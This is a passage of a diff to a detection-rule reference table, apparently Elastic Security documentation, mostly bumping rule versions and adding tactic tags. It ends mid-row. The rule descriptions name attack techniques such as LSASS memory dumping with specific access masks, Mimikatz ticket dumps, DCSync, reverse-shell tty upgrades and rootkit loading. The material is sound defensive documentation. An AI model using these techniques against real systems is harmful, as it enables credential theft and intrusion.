|<<file-and-directory-permissions-modification, File and Directory Permissions Modification>> |Identifies the change of permissions/ownership of files/folders through built-in Windows utilities. Threat actors may require permission modification of files/folders to change, modify or delete them. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<file-made-immutable-by-chattr, File made Immutable by Chattr>> |Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<file-made-immutable-by-chattr, File made Immutable by Chattr>> |Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<file-or-directory-deletion-command, File or Directory Deletion Command>> |This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 @@ -550,17 +560,17 @@ and their rule type is `machine_learning`. |<<finder-sync-plugin-registered-and-enabled, Finder Sync Plugin Registered and Enabled>> |Finder Sync plugins enable users to extend Finder’s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<first-time-seen-aws-secret-value-accessed-in-secrets-manager, First Time Seen AWS Secret Value Accessed in Secrets Manager>> |An adversary equipped with compromised credentials may attempt to access the secrets in secrets manager to steal certificates, credentials, or other sensitive material. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Credential Access], [Resources: Investigation Guide] |8.6.0 |207 +|<<first-time-seen-aws-secret-value-accessed-in-secrets-manager, First Time Seen AWS Secret Value Accessed in Secrets Manager>> |An adversary equipped with compromised credentials may attempt to access the secrets in secrets manager to steal certificates, credentials, or other sensitive material. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Credential Access], [Resources: Investigation Guide] |8.9.0 |308 |<<first-time-seen-commonly-abused-remote-access-tool-execution, First Time Seen Commonly Abused Remote Access Tool Execution>> |Adversaries may install legitimate remote access tools (RAT) to compromised endpoints for further command-and-control (C2). Adversaries can rely on installed RATs for persistence, execution of native commands and more. This rule detects when a process is started whose name or code signature resembles commonly abused RATs. This is a New Terms rule type indicating the host has not seen this RAT process started before within the last 30 days. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.4.0 |4 -|<<first-time-seen-driver-loaded, First Time Seen Driver Loaded>> |Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<first-time-seen-driver-loaded, First Time Seen Driver Loaded>> |Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 |<<first-time-seen-google-workspace-oauth-login-from-third-party-application, First Time Seen Google Workspace OAuth Login from Third-Party Application>> |Detects the first time a third-party application logs in and authenticated with OAuth. OAuth is used to grant permissions to specific resources and services in Google Workspace. Compromised credentials or service accounts could allow an adversary to authenticate to Google Workspace as a valid user and inherit their privileges. |[Domain: Cloud], [Data Source: Google Workspace], [Tactic: Defense Evasion], [Tactic: Initial Access] |8.4.0 |2 |<<first-time-seen-removable-device, First Time Seen Removable Device>> |Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |2 -|<<firsttime-seen-account-performing-dcsync, FirstTime Seen Account Performing DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Resources: Investigation Guide] |8.4.0 |6 +|<<firsttime-seen-account-performing-dcsync, FirstTime Seen Account Performing DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Resources: Investigation Guide] |8.4.0 |7 |<<forwarded-google-workspace-security-alert, Forwarded Google Workspace Security Alert>> |Identifies the occurrence of a security alert from the Google Workspace alerts center. Google Workspace's security alert center provides an overview of actionable alerts that may be affecting an organization's domain. An alert is a warning of a potential security issue that Google has detected. |[Domain: Cloud], [Data Source: Google Workspace], [Use Case: Log Auditing], [Use Case: Threat Detection] |8.4.0 |2 @@ -654,7 +664,7 @@ and their rule type is `machine_learning`. |<<group-policy-discovery-via-microsoft-gpresult-utility, Group Policy Discovery via Microsoft GPResult Utility>> |Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<halfbaked-command-and-control-beacon, Halfbaked Command and Control Beacon>> |Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |103 +|<<halfbaked-command-and-control-beacon, Halfbaked Command and Control Beacon>> |Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |104 |<<hidden-files-and-directories-via-hidden-flag, Hidden Files and Directories via Hidden Flag>> |Identify activity related where adversaries can add the 'hidden' flag to files to hide them from the user in an attempt to evade detection. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 @@ -662,9 +672,9 @@ and their rule type is `machine_learning`. |<<high-mean-of-rdp-session-duration, High Mean of RDP Session Duration>> |A machine learning job has detected unusually high mean of RDP session duration. Long RDP sessions can be used to evade detection mechanisms via session persistence, and might be used to perform tasks such as lateral movement, that might require uninterrupted access to a compromised machine. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 -|<<high-number-of-okta-user-password-reset-or-unlock-attempts, High Number of Okta User Password Reset or Unlock Attempts>> |Identifies a high number of Okta user password reset or account unlock attempts. An adversary may attempt to obtain unauthorized access to Okta user accounts using these methods and attempt to blend in with normal activity in their target's environment and evade detection. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |106 +|<<high-number-of-okta-user-password-reset-or-unlock-attempts, High Number of Okta User Password Reset or Unlock Attempts>> |Identifies a high number of Okta user password reset or account unlock attempts. An adversary may attempt to obtain unauthorized access to Okta user accounts using these methods and attempt to blend in with normal activity in their target's environment and evade detection. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |207 -|<<high-number-of-process-terminations, High Number of Process Terminations>> |This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<high-number-of-process-terminations, High Number of Process Terminations>> |This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 |<<high-number-of-process-and-or-service-terminations, High Number of Process and/or Service Terminations>> |This rule identifies a high number (10) of process terminations (stop, delete, or suspend) from the same host within a short time period. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 @@ -672,27 +682,29 @@ and their rule type is `machine_learning`. |<<host-files-system-changes-via-windows-subsystem-for-linux, Host Files System Changes via Windows Subsystem for Linux>> |Detects files creation and modification on the host system from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<hosts-file-modified, Hosts File Modified>> |The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<hosts-file-modified, Hosts File Modified>> |The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<hping-process-activity, Hping Process Activity>> |Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<hping-process-activity, Hping Process Activity>> |Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<iis-http-logging-disabled, IIS HTTP Logging Disabled>> |Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 |<<ipsec-nat-traversal-port-activity, IPSEC NAT Traversal Port Activity>> |This rule detects events that could be describing IPSEC NAT Traversal traffic. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal enables these tunnels to communicate over the Internet where one of the sides is behind a NAT router gateway. This may be common on your network, but this technique is also used by threat actors to avoid detection. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |104 -|<<image-file-execution-options-injection, Image File Execution Options Injection>> |The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<image-file-execution-options-injection, Image File Execution Options Injection>> |The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 + +|<<image-loaded-with-invalid-signature, Image Loaded with Invalid Signature>> |Identifies binaries that are loaded and with an invalid code signature. This may indicate an attempt to masquerade as a signed binary. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 |<<imageload-via-windows-update-auto-update-client, ImageLoad via Windows Update Auto Update Client>> |Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<inbound-connection-to-an-unsecure-elasticsearch-node, Inbound Connection to an Unsecure Elasticsearch Node>> |Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. |[Use Case: Threat Detection], [Tactic: Initial Access], [Domain: Endpoint] |8.3.0 |103 +|<<inbound-connection-to-an-unsecure-elasticsearch-node, Inbound Connection to an Unsecure Elasticsearch Node>> |Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. |[Use Case: Threat Detection], [Tactic: Initial Access], [Domain: Endpoint] |8.3.0 |104 |<<incoming-dcom-lateral-movement-via-mshta, Incoming DCOM Lateral Movement via MSHTA>> |Identifies the use of Distributed Component Object Model (DCOM) to execute commands from a remote host, which are launched via the HTA Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally while attempting to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<incoming-dcom-lateral-movement-with-mmc, Incoming DCOM Lateral Movement with MMC>> |Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 +|<<incoming-dcom-lateral-movement-with-mmc, Incoming DCOM Lateral Movement with MMC>> |Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |106 |<<incoming-dcom-lateral-movement-with-shellbrowserwindow-or-shellwindows, Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows>> |Identifies use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the ShellBrowserWindow or ShellWindows Application COM Object. This behavior may indicate an attacker abusing a DCOM application to stealthily move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<incoming-execution-via-powershell-remoting, Incoming Execution via PowerShell Remoting>> |Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |106 +|<<incoming-execution-via-powershell-remoting, Incoming Execution via PowerShell Remoting>> |Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |107 |<<incoming-execution-via-winrm-remote-shell, Incoming Execution via WinRM Remote Shell>> |Identifies remote execution via Windows Remote Management (WinRM) remote shell on a target host. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |106 @@ -706,31 +718,31 @@ and their rule type is `machine_learning`. |<<installation-of-custom-shim-databases, Installation of Custom Shim Databases>> |Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |105 -|<<installation-of-security-support-provider, Installation of Security Support Provider>> |Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<installation-of-security-support-provider, Installation of Security Support Provider>> |Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<interactive-exec-command-launched-against-a-running-container, Interactive Exec Command Launched Against A Running Container>> |This rule detects interactive 'exec' events launched against a container using the 'exec' command. Using the 'exec' command in a pod allows a user to establish a temporary shell session and execute any process/command inside the container. This rule specifically targets higher-risk interactive commands that allow real-time interaction with a container's shell. A malicious actor could use this level of access to further compromise the container environment or attempt a container breakout. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 -|<<interactive-terminal-spawned-via-perl, Interactive Terminal Spawned via Perl>> |Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<interactive-terminal-spawned-via-perl, Interactive Terminal Spawned via Perl>> |Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<interactive-terminal-spawned-via-python, Interactive Terminal Spawned via Python>> |Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<interactive-terminal-spawned-via-python, Interactive Terminal Spawned via Python>> |Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<krbtgt-delegation-backdoor, KRBTGT Delegation Backdoor>> |Identifies the modification of the msDS-AllowedToDelegateTo attribute to KRBTGT. Attackers can use this technique to maintain persistence to the domain by having the ability to request tickets for the KRBTGT service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |105 |<<kerberos-cached-credentials-dumping, Kerberos Cached Credentials Dumping>> |Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets. Adversaries may attempt to dump credential material in the form of tickets that can be leveraged for lateral movement. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<kerberos-pre-authentication-disabled-for-user, Kerberos Pre-authentication Disabled for User>> |Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |107 +|<<kerberos-pre-authentication-disabled-for-user, Kerberos Pre-authentication Disabled for User>> |Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |108 |<<kerberos-traffic-from-unusual-process, Kerberos Traffic from Unusual Process>> |Identifies network connections to the standard Kerberos port from an unusual process. On Windows, the only process that normally performs Kerberos traffic from a domain joined host is lsass.exe. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<kernel-load-or-unload-via-kexec-detected, Kernel Load or Unload via Kexec Detected>> |This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<kernel-load-or-unload-via-kexec-detected, Kernel Load or Unload via Kexec Detected>> |This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<kernel-module-removal, Kernel Module Removal>> |Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<kernel-module-load-via-insmod, Kernel Module Load via insmod>> |Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Rootkit], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<kernel-module-load-via-insmod, Kernel module load via insmod>> |Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Rootkit], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<kernel-module-removal, Kernel Module Removal>> |Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<keychain-password-retrieval-via-command-line, Keychain Password Retrieval via Command Line>> |Adversaries may collect keychain storage data from a system to in order to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<kirbi-file-creation, Kirbi File Creation>> |Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<kirbi-file-creation, Kirbi File Creation>> |Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<kubernetes-anonymous-request-authorized, Kubernetes Anonymous Request Authorized>> |This rule detects when an unauthenticated user request is authorized within the cluster. Attackers may attempt to use anonymous accounts to gain initial access to the cluster or to avoid attribution of their activities within the cluster. This rule excludes the /healthz, /livez and /readyz endpoints which are commonly accessed anonymously. |[Data Source: Kubernetes], [Tactic: Execution], [Tactic: Initial Access], [Tactic: Defense Evasion] |8.4.0 |5 @@ -760,9 +772,9 @@ and their rule type is `machine_learning`. |<<lsass-memory-dump-handle-access, LSASS Memory Dump Handle Access>> |Identifies handle requests for the Local Security Authority Subsystem Service (LSASS) object access with specific access masks that many tools with a capability to dump memory to disk use (0x1fffff, 0x1010, 0x120089). This rule is tool agnostic as it has been validated against a host of various LSASS dump tools such as SharpDump, Procdump, Mimikatz, Comsvcs etc. It detects this behavior at a low level and does not depend on a specific tool or dump file name. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |8.3.0 |108 -|<<lsass-process-access-via-windows-api, LSASS Process Access via Windows API>> |Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.7.0 |3 +|<<lsass-process-access-via-windows-api, LSASS Process Access via Windows API>> |Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Execution], [Data Source: Elastic Defend] |8.7.0 |4 -|<<lateral-movement-via-startup-folder, Lateral Movement via Startup Folder>> |Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<lateral-movement-via-startup-folder, Lateral Movement via Startup Folder>> |Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<launch-agent-creation-or-modification-and-immediate-loading, Launch Agent Creation or Modification and Immediate Loading>> |An adversary can establish persistence by installing a new launch agent that executes at login by using launchd or launchctl to load a plist into the appropriate directories. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 @@ -770,7 +782,7 @@ and their rule type is `machine_learning`. |<<linux-group-creation, Linux Group Creation>> |Identifies attempts to create a new group. Attackers may create new groups to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |2 -|<<linux-restricted-shell-breakout-via-linux-binary-s, Linux Restricted Shell Breakout via Linux Binary(s)>> |Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an 